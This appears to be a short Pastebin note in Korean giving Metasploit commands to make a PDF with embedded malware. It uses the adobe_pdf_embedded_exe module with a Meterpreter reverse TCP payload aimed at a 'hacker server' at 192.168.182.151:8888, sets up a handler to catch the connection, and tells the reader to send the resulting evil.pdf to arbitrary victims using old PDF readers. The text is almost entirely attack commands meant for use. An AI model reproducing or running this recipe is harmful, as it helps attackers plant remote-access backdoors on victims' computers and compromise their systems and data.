Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #metasploit을 이용한 악성코드 삽입된 PDF 파일 만들기
- use exploit/windows/fileformat/adobe_pdf_embedded_exe
- set infilename /root/hello.pdf (깨끗한 PDF 파일)
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.182.151 (해커서버)
- set lport 8888 (기다릴 포트)
- exploit
- 실행하면
- /root/.msf4/local/evil.pdf 가 새로 생성됨
- metasploit에서 서버 모드
- use multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.182.151
- set lport 8888
- exploit
- 서버 모드 동작됨
- 위에 생성된 evil.pdf 를 임의의 사용자(PDF reader 8,9 버전 사용자)에게 전송하고, 이 PDF를 읽으면
- 피해자의 PC에 악성코드에 의해서 해커의 서버로 (192.168.182.151:8888) 로 연결됨 (metepreter)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement